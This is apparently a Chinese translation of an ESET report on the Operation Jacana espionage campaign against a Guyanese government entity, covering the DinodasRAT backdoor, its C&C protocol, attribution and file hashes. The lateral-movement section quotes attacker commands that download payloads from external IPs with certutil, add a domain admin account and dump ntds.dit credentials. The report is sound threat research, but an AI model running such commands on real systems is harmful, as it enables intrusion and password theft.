2023年2月,ESET的研究人员发现了一场针对圭亚那政府实体的鱼叉式网络钓鱼活动。
在这次攻击中,操作员使用了一个以前未记录的C++后门,该后门可以过滤文件、操作Windows注册表项、执行CMD命令等等。我们根据后门发送给C&C的受害者标识符将其命名为DinodasRAT:字符串总是以Din开头,这让我们想起了《指环王》中的霍比特人Dinodas。
这次活动是有针对性的,因为威胁行为者专门制作了电子邮件来吸引他们选择的受害者组织。在使用 DinodasRAT 成功入侵第一批机器后,操作员继续横向移动并破坏目标的内部网络,他们再次部署了 DinodasRAT 后门以及其他恶意工具,其中包括 Korplug(又名 PlugX)的变体。Jacana 行动中的妥协流程概述如图 1 所示。
图 1. Jacana 行动妥协流程
归因
截至撰写本文时,我们尚无法将 Jacana 行动归因于任何已知组织。然而,多亏了我们发现的一条线索,我们觉得我们对肇事者并不是完全一无所知。在攻击过程中,威胁行为者部署了 Korplug 的变体(又名 PlugX),这对于与中国结盟的组织来说很常见,例如Mustang Panda 的 Hodur:老把戏,新的 Korplug 变体。
虽然我们对与中国结盟的威胁行为者的归因只有中等可信度,但圭亚那与中国外交关系的最新发展进一步支持了这一假设。2023 年 2 月,即“Jacana 行动”发生的同一个月,圭亚那特别有组织犯罪部门 (SOCU) 在一项涉及中国公司的洗钱调查中逮捕了三人,当地中国大使馆对这一行为提出异议。此外,作为“一带一路”倡议的一部分,中国在圭亚那拥有经济利益。
初始访问
作为破坏受害者网络的第一步,Jacana 行动背后的威胁行为者向目标组织发送了涉及圭亚那公共事务的鱼叉式网络钓鱼电子邮件。我们观察到以下主题行:
- President Mohamed Irfaan Ali's Official Visit to Nassau, The Bahamas
- Guyanese fugitive in Vietnam
根据电子邮件主题,运营商一定一直在关注圭亚那的政治动态——我们在目标政府实体登记新的检测结果的时间恰逢圭亚那总统出席在拿骚举行的加勒比共同体会议。
鱼叉式网络钓鱼电子邮件包含一个链接,单击该链接即可从https://fta.moit.gov[.]vn/file/people.zip下载 ZIP 文件。由于以gov.vn结尾的域名表示越南政府网站,因此我们认为运营商能够危害另一个政府实体并使用它来托管其恶意软件样本。我们已向 VNCERT 通报了基础设施受损的情况。
一旦受害者提取了不受密码保护的 ZIP 文件并启动了其中的可执行文件,他们就会受到 DinodasRAT 恶意软件的攻击。提取的文件名与网络钓鱼电子邮件主题行相关:
- Guyanese fugitive in Vietnam20220101to20230214Guyanese fugitive in Vietnam.docx.exe
- The Bahamas/President Mohamed Irfaan Ali’s Official Visit to Nassau, The Bahamas.doc.exe
横向运动
突破目标后,攻击者继续穿越受害者的内部网络。根据我们的遥测,网络中触发了BAT/Impacket.M和相关检测,这表明使用了Impacket或类似的基于 WMI 的横向移动工具。
攻击者在网络上执行的一些命令包括:
- certutil -urlcache -split http://23.106.123[.]166/vmtools.rar
- net user test8 Test123.. /add /do
- net group "domain admins" test8 /add /do
- certutil -urlcache -split -f http://23.106.122[.]5/windowsupdate.txt c:programdatawindowsupdate.txt
- cd c:programdata
- c:programdatawindowsupdate.exe
- powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:temp' q q"
最后一个命令使用 LOLBin ntdsutil.exe转储ntds.dit。这允许转储存储在 Windows 服务器上的密码。
工具集
恐龙鼠
DinodasRAT 是一种以前未记录的远程访问木马,用 C++ 开发,具有多种功能,允许攻击者从受害者的计算机上监视和收集敏感信息。
执行时,恶意软件首先检查是否传递了三个参数。如果存在,这些参数必须按以下顺序包含以下信息:
如果传递了所有三个参数,DinodasRAT 将使用 Windows API TerminateProcess终止由进程 ID 表示的进程,然后使用 Windows API DeleteFileW删除第三个参数中传递的文件。此后,进程使用 C++ 标准库退出函数停止执行。这很可能是作为卸载功能。
如果没有传递任何参数,DinodasRAT 将通过创建名为 client 的互斥锁来继续执行,并检查常规 Windows 目录C:ProgramData是否存在。如果存在,恶意软件会创建一个名为Application Doc的子目录,用于分配配置文件和其他与后门相关的文件。如果 Windows 目录不存在,DinodasRAT 会在根目录中创建一个名为Program.FilesApplication.Doc的路径。字符串Application Doc、ProgramData和Program.FilesApplication.Doc使用Tiny Encryption Algorithm (TEA) 进行加密。
创建的应用程序文档目录具有只读和隐藏属性。在Application Doc内部,DinodasRAT 创建两个子目录,名为0和1。一旦目录存在,恶意软件就会生成三个用于数据收集和泄露的线程。表 1 给出了它们行为的详细描述。
表 1. 线程描述
线程生成后,DinodasRAT在主目录中创建一个名为conf.ini的文件。该文件包含用于向 C&C 服务器识别受害者的 ID。
图 2 显示了保存在conf.ini文件中的 ID 示例。
图 2.conf.ini文件中保存的 ID 示例
ID 的格式为Din____V1,其中:
- 是安装日期,
- 使用受害者的 IP 地址和安装日期(以毫秒为单位)计算得出,
- 是一个随机值,并且
- V1可能是恶意软件版本。
TEA:微型加密算法
DinodasRAT 使用 TEA 来解密其一些字符串,以及加密/解密发送到其 C&C 服务器或从其 C&C 服务器接收的数据。TEA(微小加密算法)是一种简单的分组密码,以其易于在软件和硬件中实现而闻名。例如,其编码功能的原始参考实现仅包含几行C代码,设置时间非常短,并且没有预设值表。DinodasRAT 采用密码块链接 (CBC) 模式的算法。在某些情况下,加密数据在发送到 C&C 服务器之前会进一步使用 Base64 进行编码。
我们发现该恶意软件包含三个不同的密钥,用于不同的加密/解密场景,如表 2 所示。
表 2. DinodasRAT 使用的 TEA 密钥
攻击者选择使用 TEA 可能是为了让自己的工作变得更轻松 - 我们有理由相信恶意软件的算法实现不是从头开始创建的,而是可以改编自 BlackFeather 的博客文章 Tea Algorithm - C++。
C&C 通信和恶意活动
为了与 C&C 服务器进行通信,DinodasRAT 使用 Winsock 库创建使用 TCP 协议的套接字。尽管 TCP 是用于从 C&C 服务器发送和接收信息的默认协议,但我们已经看到 DinodasRAT 能够更改为 UDP 协议。
后门还为不同目的创建各种线程,例如操纵接收到的命令以在受害者的计算机上执行。因此,为了保持同步通信,DinodasRAT 通过使用 Windows API 函数(如CreateEventW、SetEventW和WaitForSingleObject )来利用 Windows 事件对象。
为了开始与 C&C 服务器的主要通信,DinodasRAT 发送一个数据包,其中包含有关受害者计算机及其配置的基本信息,例如:
- Windows 版本,
- 操作系统架构,
- 用户名,
- 以 Base64 编码的恶意软件执行路径,以及
- 用于 UDP 协议的值,默认为800。
图 3 不仅显示了收集到的有关受害者的基本信息,还显示了恶意软件生成的 ID,该 ID 用作 C&C 服务器的受害者标识符。
图3. 加密前的基本信息
DinodasRAT 通过 TCP 协议发送到 C&C 服务器的所有信息均经过 TEA 加密。除此之外,一些信息也是经过base64编码的。
为了将窃取的信息发送到 C&C 服务器,DinodasRAT 制作了一个包含以下内容的数据包:
- 第一个字节:一个 ID,可能指示数据是 TEA 加密 ( 0x30 ) 还是 Base64 编码和 TEA 加密 ( 0x32 )。
- 下一个DWORD:加密数据大小。
- 剩余字节:加密数据。
图 4 显示了发送到 C&C 服务器的加密数据包的示例。
图 4. 加密数据包示例
在我们的分析过程中,我们无法从 C&C 服务器获得响应,但我们能够确定从服务器接收到的任何数据包也应该使用 TEA 进行加密。
当处理从 C&C 服务器接收到的命令时,DinodasRAT 创建一个带有无限循环的线程,负责接收和确定数据包是否包含要执行的加密命令。
数据包一旦解密,包含以下结构:
- 第一个 DWORD:要执行的操作 ID,十六进制值(参见表 2)。
- 第二个 DWORD:另一个 ID,与在客户端指示该数据包是要在受害者计算机上执行的命令值(十六进制)有关。
- 数据包的其余部分:要执行的命令所使用的数据。
DinodasRAT 包含能够在受害者的计算机或恶意软件本身上执行各种操作的命令。表 3 列出了支持的命令以及每个命令的简短说明。
表 3. DinodasRAT 命令
在我们的调查过程中,我们只看到了 ID 变量的创建和使用及其在conf.ini文件中的相应值,该变量用于向 C&C 服务器指示受害者。
此外,DinodasRAT 使用多用途全局变量,例如,该变量可以包含要删除的文件名的路径或要创建的 Windows 注册表子项的名称。
其他恶意软件样本
攻击者在入侵过程中还使用了除 DinodasRAT 之外的其他工具:
- Korplug 的变体(又名 PlugX)——与中国结盟的威胁组织通常使用的后门。
- SoftEther VPN客户端。这可能用于将本地端口(例如 RDP)代理到 C&C 服务器。
结论
Jacana 行动是一场网络间谍活动,影响了圭亚那的一个政府实体。我们有中等信心地认为,这是由与中国结盟的 APT 组织实施的。
攻击者结合使用了以前未知的工具(例如 DinodasRAT)和更传统的后门(例如 Korplug)。
根据用于初始访问受害者网络的鱼叉式网络钓鱼电子邮件,运营商正在跟踪受害者的地缘政治活动,以增加其行动成功的可能性。
国际奥委会
文件
SHA-1 文件名 检测 描述
599EA9B26581EBC7B4BDFC02E6C792B6588B751E President Mohamed Irfaan Ali’s Official Visit to Nassau, The Bahamas.doc.exe Win32/DinodasRAT.A DinodasRAT
8BDC8FA3E398733F50F8572D04172CD4B9765BBC client.exe Win32/DinodasRAT.A DinodasRAT
9C660AC9E32AD853CAAA995F5FC112E281D8520A tools.exe Win32/DinodasRAT.A DinodasRAT
6022383243927CAFC74D8DC937423DBED2A170B8 Client.exe Win32/DinodasRAT.A DinodasRAT
B2B86DDA48A109EDD932B460649F60F505D5D71C windowsupdate.exe Win32/DinodasRAT.A DinodasRAT
EFD1387BB272FFE75EC9BF5C1DD614356B6D40B5 people.zip Win32/DinodasRAT.A 包含DinodasRAT的ZIP文件
9343E9716933382DA172124803F5463A8454E347 lass.exe Win64/Agent.CAY 装载机。执行Jacana行动中使用的 DLL
C92DAC928D70EDED7D52CB1347850AA422CEA817 2.dll Win64/Spy.Agent.DD 用于从机器窃取信息(例如剪贴板数据)的 DLL
FFBA119D86688AFC098109E08811F67A6E5DECDA 1.dll Win64/DinodasRAT.A DinodasRAT
9A6E803A28D27462D2DF47B52E34120FB2CF814B President Mohamed Irfaan Ali’s Official Visit to Nassau, The Bahamas.exe Win32/DinodasRAT.B DinodasRAT
33065850B30A7C797A9F1E5B219388C6991674DB 114.exe Win32/DinodasRAT.B DinodasRAT
6129E37412AFEAFEE47ECEB4C52094EE185E6768 hh.hsnx Win32/DinodasRAT.B DinodasRAT
010451191D8556DCF65C7187BE9579E99323F74D COTED_Att. I to Sav. 230 (Draft Agenda).docx.exe Win32/DinodasRAT.A DinodasRAT
转载来源:https://www.welivesecurity.com/en/eset-research/operation-jacana-spying-guyana-entity/
图片来源网络侵权可联系删除